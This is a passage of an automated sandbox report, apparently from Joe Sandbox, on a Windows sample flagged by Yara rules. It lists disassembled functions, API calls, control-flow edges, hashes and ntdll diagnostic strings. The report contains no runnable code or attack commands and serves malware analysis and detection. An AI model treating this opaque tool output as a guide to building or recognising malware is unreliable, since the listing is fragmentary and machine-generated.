                                                              • Instruction ID: 9eb7ceefee369cdea40d228d93f8d639d43af6248c8c9af65430fdee15c0a0e2
                                                              • Opcode Fuzzy Hash: 1d9cac39d44b0b58d2998c6013f9c15776d01e32050135424077ffa3ae8e5779
                                                              • Instruction Fuzzy Hash: BA900275B0550402E100719C45287061005D7D0206FA5C451A0424568DC7958A5566A2
                                                              Function 00414320 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 87threadwindowCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • PostThreadMessageW.USER32(UQ63g7r-,00000111,00000000,00000000), ref: 00414427
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2324217604.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_400000_0Wu31IhwGO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID: UQ63g7r-$UQ63g7r-
                                                              • API String ID: 1836367815-2341035416
                                                              • Opcode ID: d8bb71b3de400eed59a08beff8e757dd903ada585e85bf85bc0fb80483de176b
                                                              • Instruction ID: c654e7dd82306ad07be20f2182398129074d27dccdf197e7b8b500296daea260
                                                              • Opcode Fuzzy Hash: d8bb71b3de400eed59a08beff8e757dd903ada585e85bf85bc0fb80483de176b
                                                              • Instruction Fuzzy Hash: 6A21F972E4421C7EEB01AE959C82DEF7B7CEF40798B40816AF904A7241D6389E1687E5
                                                              Function 004143A9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 66threadwindowCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • PostThreadMessageW.USER32(UQ63g7r-,00000111,00000000,00000000), ref: 00414427
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2324217604.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_400000_0Wu31IhwGO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID: UQ63g7r-$UQ63g7r-
                                                              • API String ID: 1836367815-2341035416
                                                              • Opcode ID: 8d6bffc5187429553e2ad7040074804356c752e35f2aec9c3f1fcfce86f7cced
                                                              • Instruction ID: 934fb77fa0409c7874f7a2f8fe5ac0ceccbab11669475182c5f65d5113228a07
                                                              • Opcode Fuzzy Hash: 8d6bffc5187429553e2ad7040074804356c752e35f2aec9c3f1fcfce86f7cced
                                                              • Instruction Fuzzy Hash: 1D1108B1D4021C7AEB10ABE19CC1DEF7B7CDF41798F408069FA04B7200D6785E068BA5
                                                              Function 004143B3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • PostThreadMessageW.USER32(UQ63g7r-,00000111,00000000,00000000), ref: 00414427
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2324217604.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_400000_0Wu31IhwGO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID: UQ63g7r-$UQ63g7r-
                                                              • API String ID: 1836367815-2341035416
                                                              • Opcode ID: 3c4c82ffe9e2637f9c0b03e17c2ef05438faead3bb8494bc245809be69176afb
                                                              • Instruction ID: 7656ebaa64e068870cd233fd54207e833a46b1e9e0b7fb7ddf8ec8f242163898
                                                              • Opcode Fuzzy Hash: 3c4c82ffe9e2637f9c0b03e17c2ef05438faead3bb8494bc245809be69176afb
                                                              • Instruction Fuzzy Hash: CF01D2B2D4021C7AEB10ABE19CC2DEF7B7CDF40798F408069FA04B7240D6785E068BA5
                                                              Function 00417BDE Relevance: 1.6, APIs: 1, Instructions: 101COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 333 417bde-417bdf 334 417be1-417bf3 333->334 335 417c55-417c67 333->335 340 417c2e-417c38 334->340 336 417c68-417c70 335->336 339 417c72-417c74 336->339 336->340 339->336 341 417c76-417c7a 339->341 340->335 342 417c3a-417c3b 340->342 343 417c8c-417c98 341->343 344 417c7c-417c82 341->344 345 417bca-417bd7 LdrLoadDll 342->345 346 417c3d 342->346 350 417c99-417cae 343->350 348 417cc0-417cc1 344->348 349 417c84 344->349 347 417bda-417bdd 345->347 346->335 349->350 351 417c87 349->351 352 417cb0 350->352 353 417d17-417d2b call 42b9b3 350->353 351->343 354 417cb2-417cbe 352->354 355 417d2e-417d3f 352->355 353->355 354->348
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2324217604.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_400000_0Wu31IhwGO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 192c4f8d791a74f5fc4a3e9ce53003c0e739193646856a7bd5574ecafb04c77f
                                                              • Instruction ID: c5951bf59670ed95c8a229a69371e0f0c9dc29fdd02334928d99ddc3ca0f2906
                                                              • Opcode Fuzzy Hash: 192c4f8d791a74f5fc4a3e9ce53003c0e739193646856a7bd5574ecafb04c77f
                                                              • Instruction Fuzzy Hash: 29219EB67442051FC315CE64EC81BF9B734EB92325F11029AF904CF381E6255D56C7E5
                                                              Function 00417BF8 Relevance: 1.6, APIs: 1, Instructions: 96libraryloaderCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 358 417bf8-417c23 360 417c70 358->360 361 417c25-417c28 358->361 362 417c72-417c74 360->362 363 417c2e-417c38 360->363 364 417be5-417bf3 361->364 365 417c2a 361->365 366 417c76-417c7a 362->366 367 417c68-417c6e 362->367 370 417c55-417c67 363->370 371 417c3a-417c3b 363->371 364->358 368 417bb8-417bc1 365->368 369 417c2c-417c38 365->369 374 417c8c-417c98 366->374 375 417c7c-417c82 366->375 367->360 372 417bc3-417bc9 368->372 373 417bda-417bdd 368->373 369->370 369->371 370->367 376 417bca-417bd7 LdrLoadDll 371->376 377 417c3d 371->377 372->376 380 417c99-417cae 374->380 378 417cc0-417cc1 375->378 379 417c84 375->379 376->373 377->370 379->380 381 417c87 379->381 382 417cb0 380->382 383 417d17-417d2b call 42b9b3 380->383 381->374 384 417cb2-417cbe 382->384 385 417d2e-417d3f 382->385 383->385 384->378
                                                              APIs
                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417BD5
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2324217604.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_400000_0Wu31IhwGO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Load
                                                              • String ID:
                                                              • API String ID: 2234796835-0
                                                              • Opcode ID: 05ce74115300aa1d0386c8a992e5465be043cc1f53121675ba303ccf5aa30423
                                                              • Instruction ID: 00ac5599f99533841f8bda13b0be2f1b62a40995406928251777d9fad877b1ce
                                                              • Opcode Fuzzy Hash: 05ce74115300aa1d0386c8a992e5465be043cc1f53121675ba303ccf5aa30423
                                                              • Instruction Fuzzy Hash: CD21AB3A70C10A9FCB118E24D844AEAFF74EF96719B2041DAD450CB342E226A98687D8
                                                              Function 0042CC63 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 404 42cc63-42cca1 call 404643 call 42db53 RtlAllocateHeap
                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(?,0041E8EB,?,?,00000000,?,0041E8EB,?,?,?), ref: 0042CC9C
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2324217604.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_400000_0Wu31IhwGO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              • Opcode ID: a629522e6cb8f85e8bdb182f51a111a0892afd8ed588c6852a699a7bde638c1b
                                                              • Instruction ID: 7c74d4e41703ecf2ac74f9d9b4895f51b419b40aa0f09aed774a1cc672b14946
                                                              • Opcode Fuzzy Hash: a629522e6cb8f85e8bdb182f51a111a0892afd8ed588c6852a699a7bde638c1b
                                                              • Instruction Fuzzy Hash: 3DE09AB22042187BCA14EF5AEC41F9B37ACEFC9710F004419FA08A7341D675BA108BB8
                                                              Function 0042CCA3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 409 42cca3-42cce1 call 404643 call 42db53 RtlFreeHeap
                                                              APIs
                                                              • RtlFreeHeap.NTDLL(00000000,00000004,00000000,3777EA40,00000007,00000000,00000004,00000000,004173E4,000000F4), ref: 0042CCDC
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2324217604.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_400000_0Wu31IhwGO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FreeHeap
                                                              • String ID:
                                                              • API String ID: 3298025750-0
                                                              • Opcode ID: cdd6b400f2d781c627cbe586a591c7bbeaa857b726842983189184a5aa92914a
                                                              • Instruction ID: 17ffdd14cf893de34d185b730fd02e884b2db9c7d9af60b921a6e04f82d44752
                                                              • Opcode Fuzzy Hash: cdd6b400f2d781c627cbe586a591c7bbeaa857b726842983189184a5aa92914a
                                                              • Instruction Fuzzy Hash: C8E06D712002047BC610EE49DC42F9B37ACEFC5714F004419F908A7341D674B9108AB8
                                                              Function 0042CCE3 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 419 42cce3-42cd1f call 404643 call 42db53 ExitProcess
                                                              APIs
                                                              • ExitProcess.KERNEL32(?,00000000,00000000,?,9A0A6B39,?,?,9A0A6B39), ref: 0042CD1A
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2324217604.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_400000_0Wu31IhwGO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExitProcess
                                                              • String ID:
                                                              • API String ID: 621844428-0
                                                              • Opcode ID: ff46c3749a6ab0d7dff1e82a35f795f13fa1c0c29bc4e148dcdef1bc45769d99
                                                              • Instruction ID: db584931667c167d052b57122e12c945e868705e8a3680be29b3f7ccc7343bef
                                                              • Opcode Fuzzy Hash: ff46c3749a6ab0d7dff1e82a35f795f13fa1c0c29bc4e148dcdef1bc45769d99
                                                              • Instruction Fuzzy Hash: 49E04F356442147BC610AA5ADC01F9B775CEBC5754F414419FA0CA7241D675791187E4
                                                              Function 01392C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 424 1392c0a-1392c0f 425 1392c1f-1392c26 LdrInitializeThunk 424->425 426 1392c11-1392c18 424->426
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 5ce7ba760124a321ec70dcecae7d302cc463a48b341a6a694b30ff3fe13bd88b
                                                              • Instruction ID: 5395af78034d3f37a12e0fef1ddb81c430bc0ab77c9a0f02c67880c08a012418
                                                              • Opcode Fuzzy Hash: 5ce7ba760124a321ec70dcecae7d302cc463a48b341a6a694b30ff3fe13bd88b
                                                              • Instruction Fuzzy Hash: 5BB09B71D019C5D5EF11E7A4460C7177900B7D0705F55C061D2030651F4738D1D5E675

                                                              Non-executed Functions

                                                              Function 01408D10 Relevance: 37.8, Strings: 30, Instructions: 268COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              Strings
                                                              • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 01408D8C
                                                              • *** A stack buffer overrun occurred in %ws:%s, xrefs: 01408DA3
                                                              • The instruction at %p referenced memory at %p., xrefs: 01408EE2
                                                              • *** Resource timeout (%p) in %ws:%s, xrefs: 01408E02
                                                              • *** An Access Violation occurred in %ws:%s, xrefs: 01408F3F
                                                              • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 01408DD3
                                                              • *** Inpage error in %ws:%s, xrefs: 01408EC8
                                                              • The resource is owned shared by %d threads, xrefs: 01408E2E
                                                              • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 01408F2D
                                                              • <unknown>, xrefs: 01408D2E, 01408D81, 01408E00, 01408E49, 01408EC7, 01408F3E
                                                              • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 01408F34
                                                              • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 01408E4B
                                                              • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 01408DB5
                                                              • *** then kb to get the faulting stack, xrefs: 01408FCC
                                                              • Go determine why that thread has not released the critical section., xrefs: 01408E75
                                                              • an invalid address, %p, xrefs: 01408F7F
                                                              • The resource is owned exclusively by thread %p, xrefs: 01408E24
                                                              • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01408E3F
                                                              • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 01408FEF
                                                              • read from, xrefs: 01408F5D, 01408F62
                                                              • *** enter .exr %p for the exception record, xrefs: 01408FA1
                                                              • The instruction at %p tried to %s , xrefs: 01408F66
                                                              • The critical section is owned by thread %p., xrefs: 01408E69
                                                              • write to, xrefs: 01408F56
                                                              • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 01408DC4
                                                              • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01408E86
                                                              • This failed because of error %Ix., xrefs: 01408EF6
                                                              • *** enter .cxr %p for the context, xrefs: 01408FBD
                                                              • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 01408F26
                                                              • a NULL pointer, xrefs: 01408F90
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                              • API String ID: 0-108210295
                                                              • Opcode ID: 226ee6daef51107e6e539a24a409a360039d6476f7b76f67c9dcf23e38f2a396
                                                              • Instruction ID: d44a72116dd4f70c999d1339fcbf2c4dd963c22bf16fe8675b1a0da6cb4ae84d
                                                              • Opcode Fuzzy Hash: 226ee6daef51107e6e539a24a409a360039d6476f7b76f67c9dcf23e38f2a396
                                                              • Instruction Fuzzy Hash: 5981197EA40211BFDB129A2ADD85D6B3F75EF56B1CF040069F2095F3A2E3719812C661
                                                              Function 013D2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-2160512332
                                                              • Opcode ID: 641094d46b3d64ab10d152c92175cc28738deb9a82257e19cdd7fb5216ea730e
                                                              • Instruction ID: 9f8a06dafa9fd72c9029bb406c92d4922da0fbfc1cd18303bc8a6032cb12efbc
                                                              • Opcode Fuzzy Hash: 641094d46b3d64ab10d152c92175cc28738deb9a82257e19cdd7fb5216ea730e
                                                              • Instruction Fuzzy Hash: 2B928F72604342AFE721DF28D840B6BBBE8BF84758F04492DFA95D7251D770E844CB92
                                                              Function 01388620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • Thread identifier, xrefs: 013C553A
                                                              • undeleted critical section in freed memory, xrefs: 013C542B
                                                              • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 013C54CE
                                                              • 8, xrefs: 013C52E3
                                                              • Address of the debug info found in the active list., xrefs: 013C54AE, 013C54FA
                                                              • double initialized or corrupted critical section, xrefs: 013C5508
                                                              • Invalid debug info address of this critical section, xrefs: 013C54B6
                                                              • Critical section address, xrefs: 013C5425, 013C54BC, 013C5534
                                                              • Critical section debug info address, xrefs: 013C541F, 013C552E
                                                              • Critical section address., xrefs: 013C5502
                                                              • Thread is in a state in which it cannot own a critical section, xrefs: 013C5543
                                                              • corrupted critical section, xrefs: 013C54C2
                                                              • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 013C540A, 013C5496, 013C5519
                                                              • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 013C54E2
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                              • API String ID: 0-2368682639
                                                              • Opcode ID: c985f39605ffcc54ec943bd5dd69ef5f6eac0b0215641a4a8ca9e08daa66afa3
                                                              • Instruction ID: 6d8a907ff6724fe912dc5536d2f1aa7374ff53dacd1cecd25207c91fee0eea06
                                                              • Opcode Fuzzy Hash: c985f39605ffcc54ec943bd5dd69ef5f6eac0b0215641a4a8ca9e08daa66afa3
                                                              • Instruction Fuzzy Hash: 98819AB1A00358EFDB20CF99C841BAEBBB9BB48B28F10425DF505B7750D371A940CB54
                                                              Function 013829F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 013C25EB
                                                              • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 013C2409
                                                              • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 013C2412
                                                              • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 013C22E4
                                                              • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 013C24C0
                                                              • RtlpResolveAssemblyStorageMapEntry, xrefs: 013C261F
                                                              • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 013C2506
                                                              • @, xrefs: 013C259B
                                                              • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 013C2602
                                                              • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 013C2624
                                                              • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 013C2498
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                              • API String ID: 0-4009184096
                                                              • Opcode ID: 38e3cc52612eb4ab68daf509759eac5c686293cf32eab3d21f92d199387494e1
                                                              • Instruction ID: 5505e4b41e1a6d3ecdcbc685ade527b20d0543048b31dd270731a8254a0188c3
                                                              • Opcode Fuzzy Hash: 38e3cc52612eb4ab68daf509759eac5c686293cf32eab3d21f92d199387494e1
                                                              • Instruction Fuzzy Hash: FE0250F5D002299FDF21DB58CC80BEAB7B8AF54718F0441DAE649A7241DB70AE84CF59
                                                              Function 013F8B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                              • API String ID: 0-2515994595
                                                              • Opcode ID: 3bff28b8c2824d8bbd8ae8f90057966d3241bba182d376649013bd0c5ef34249
                                                              • Instruction ID: 3c10f28f7ed8a5b643bb6a77e9d75035299f32a7f7c63a8071f83fcf41a79f72
                                                              • Opcode Fuzzy Hash: 3bff28b8c2824d8bbd8ae8f90057966d3241bba182d376649013bd0c5ef34249
                                                              • Instruction Fuzzy Hash: 5351DE716053169BD729DF198844BABBBECFF94748F14496DFA98C3280E770D608CB92
                                                              Function 0136AD00 Relevance: 11.8, Strings: 9, Instructions: 509COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                              • API String ID: 0-3197712848
                                                              • Opcode ID: f1a0c259f8f2ffcc049668d4b98c82a71223e46b825c548d76138f59df07120d
                                                              • Instruction ID: 65ef1b1231d2ab0a89ac45e8161f89cd3b47e35a155ca948dc693ae928385d56
                                                              • Opcode Fuzzy Hash: f1a0c259f8f2ffcc049668d4b98c82a71223e46b825c548d76138f59df07120d
                                                              • Instruction Fuzzy Hash: 0412F3716093459FD325DF18C880BAABBE8FF8470CF04855DFA899B299E734D944CB52
                                                              Function 01400274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                              • API String ID: 0-1700792311
                                                              • Opcode ID: 5091eb0ec06ad2ecacb429eeb0ed7413793b2371357c70d535db404a9a4c1bc9
                                                              • Instruction ID: 2067a15501694986da4ef37cb5b0e59d64f8d32cd01d551e1cf33ae9acd17474
                                                              • Opcode Fuzzy Hash: 5091eb0ec06ad2ecacb429eeb0ed7413793b2371357c70d535db404a9a4c1bc9
                                                              • Instruction Fuzzy Hash: 88D1C135500685EFDB22DFAAC440BAABBF1FF5A754F08806AF4459B3A2C735E941CB14
                                                              Function 013D89B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • AVRF: -*- final list of providers -*- , xrefs: 013D8B8F
                                                              • VerifierDlls, xrefs: 013D8CBD
                                                              • VerifierDebug, xrefs: 013D8CA5
                                                              • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 013D8A67
                                                              • HandleTraces, xrefs: 013D8C8F
                                                              • VerifierFlags, xrefs: 013D8C50
                                                              • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 013D8A3D
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                              • API String ID: 0-3223716464
                                                              • Opcode ID: d8d54c8b7c5a63e1a73b4fbb6f57acf030b5264f32ee0357115d95752acc68c6
                                                              • Instruction ID: 80968dfd0f8d8dc1c4d7e0f2bd5d278536ac784ee4d87bf0d59e1dce759e4303
                                                              • Opcode Fuzzy Hash: d8d54c8b7c5a63e1a73b4fbb6f57acf030b5264f32ee0357115d95752acc68c6
                                                              • Instruction Fuzzy Hash: E89125B3641716EFEB21EF6CE880B5AB7A8BB5561CF050499FA416F290C730BC01CB95
                                                              Function 0135EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
